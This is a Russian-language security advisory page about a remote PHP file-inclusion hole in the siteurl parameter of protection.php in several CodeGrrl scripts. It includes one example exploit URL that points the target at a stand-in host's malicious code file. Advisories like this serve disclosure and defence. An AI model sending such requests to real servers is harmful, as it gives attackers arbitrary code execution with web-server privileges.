![]() |
Навигация
|
Главная » Интернет PHP инклюдинг в продуктах CodeGrrlПрограммы: PHPCalendar 1.x PHPClique 1.x PHPCurrently 2.x PHPFanBase 2.x PHPQuotes 1.x Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует при обработке входных данных в параметре siteurl сценария protection.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на системе с привилегиями web сервера. Для успешной эксплуатации уязвимости опция register_globals должна быть включена в конфигурационном файле PHP. Пример: http://www.example.com/protection.php?action=logout& siteurl=http://yourhost.com/malicoius-code.txt URL производителя: http://codegrrl.com/ Решение: Способов устранения уязвимости не существует в настоящее время.
![]() ![]() ![]() ![]() ![]() Главная » Интернет |
© 2023 Team.Furia.Ru.
Частичное копирование материалов разрешено. |